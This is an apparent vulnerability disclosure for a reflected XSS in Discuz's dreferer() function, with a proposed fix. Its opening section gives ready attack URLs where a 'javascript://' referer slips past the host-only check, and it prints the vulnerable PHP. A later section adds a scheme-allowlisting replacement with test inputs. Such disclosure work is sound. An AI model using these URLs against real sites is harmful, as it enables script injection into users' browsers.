### Brief description:

XSS caused by a flaw in a function.

### Details:

`member.php?mod=logging&action=login&referer=javascript://www.discuz.net/`

```html
<p>欢迎您回来,Newbie xx,现在将转入登录前页面<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转,请点击此链接</a></p>
```

`connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/`

```html
<p>抱歉,当前存在网络问题或服务器繁忙,详细错误:connect_error_code_0,错误代码:<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">openId signature invalid</a>,请您稍候再试。谢谢。<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转,请点击此链接</a></p>
```

source/function/function_core.php:

```php
function dreferer($default = '') {
    // ......
    if(strpos($_G['referer'], 'member.php?mod=logging')) {
        $_G['referer'] = $default;
    }
    $reurl = parse_url($_G['referer']);
    if(!empty($reurl['host']) && !in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$_SERVER['HTTP_HOST'])) && !in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$reurl['host']))) {
        if(!in_array($reurl['host'], $_G['setting']['domain']['app']) && !isset($_G['setting']['domain']['list'][$reurl['host']])) {
            $domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1);
            if(empty($_G['setting']['domain']['root']) || (is_array($_G['setting']['domain']['root']) && !in_array($domainroot, $_G['setting']['domain']['root']))) {
                $_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php';
            }
        }
    } elseif(empty($reurl['host'])) {
        $_G['referer'] = $_G['siteurl'].'./'.$_G['referer'];
    }
    $_G['referer'] = durlencode($_G['referer']);
    return $_G['referer'];
}
```

This code runs the referer through `parse_url` and compares the resulting host with `$_SERVER['HTTP_HOST']` to decide whether the URL is on-site. Because `parse_url` performs no validity checking of its own, a `javascript://www.discuz.net/` URI parses with host `www.discuz.net` and passes the check; the scheme is never looked at. The unmodified value is then written into `window.location.href` and into the fallback link's `href` (see the responses above), so the domain check is bypassed and the JS executes.

### Proof of vulnerability:

[![](https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png)](https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png)
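The fix a maintainer would want here is to allowlist the URL scheme, not only the host. The following is an added example written for this page, not Discuz's own code: a replacement referer check (the function name `safe_referer`, the `$allowedHosts` list, `$siteUrl` and the sample inputs are all constructed assumptions) that rejects the `javascript://www.discuz.net/` referer shown above while still accepting on-site absolute URLs and site-relative paths.

```php
<?php
// Added example, not Discuz code: a referer check that validates the URL
// scheme in addition to the host before the value is used as a redirect
// target. The function name, $allowedHosts and the sample inputs below are
// constructed for this illustration.

function safe_referer(string $referer, array $allowedHosts, string $siteUrl, string $default = 'index.php'): string
{
    $parts = parse_url($referer);
    if ($parts === false) {
        return $default;                               // unparsable: fall back
    }

    // parse_url() does not validate anything: "javascript://www.discuz.net/"
    // comes back with host "www.discuz.net" and scheme "javascript". A host
    // comparison alone is therefore not enough; the scheme must be allowlisted.
    if (isset($parts['scheme']) && !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $default;
    }

    if (isset($parts['host'])) {
        // Absolute URL: the host must be one of ours (exact, case-insensitive).
        if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
            return $default;
        }
        return $referer;
    }

    // No host and no disallowed scheme: a site-relative path. Anchoring it to
    // the site URL, as the original dreferer() does, keeps it on-site.
    return $siteUrl . './' . $referer;
}

$allowedHosts = ['www.discuz.net', 'discuz.net'];      // constructed allowlist
$siteUrl      = 'http://www.discuz.net/';              // constructed site URL

// Constructed inputs paired with the result each should produce.
$cases = [
    'javascript://www.discuz.net/'    => 'index.php',                        // own host, wrong scheme: rejected
    'http://www.discuz.net/forum.php' => 'http://www.discuz.net/forum.php',  // on-site absolute URL: kept
    'http://attacker.example/'        => 'index.php',                        // foreign host: rejected
    'forum.php?mod=viewthread&tid=1'  => 'http://www.discuz.net/./forum.php?mod=viewthread&tid=1',
];

foreach ($cases as $input => $expected) {
    $result = safe_referer($input, $allowedHosts, $siteUrl);
    printf("%-34s -> %s [%s]\n", $input, $result, $result === $expected ? 'ok' : 'MISMATCH');
}
```

The scheme check is what closes the gap in the original logic; the host allowlist replaces the `HTTP_HOST` comparison with an explicit list so a forged `Host` header cannot widen it. Independently of this, the template that writes the value into `href` and into the `setTimeout` string still has to HTML-escape and JS-string-escape it, since a redirect target is attacker-influenced data however well it validates.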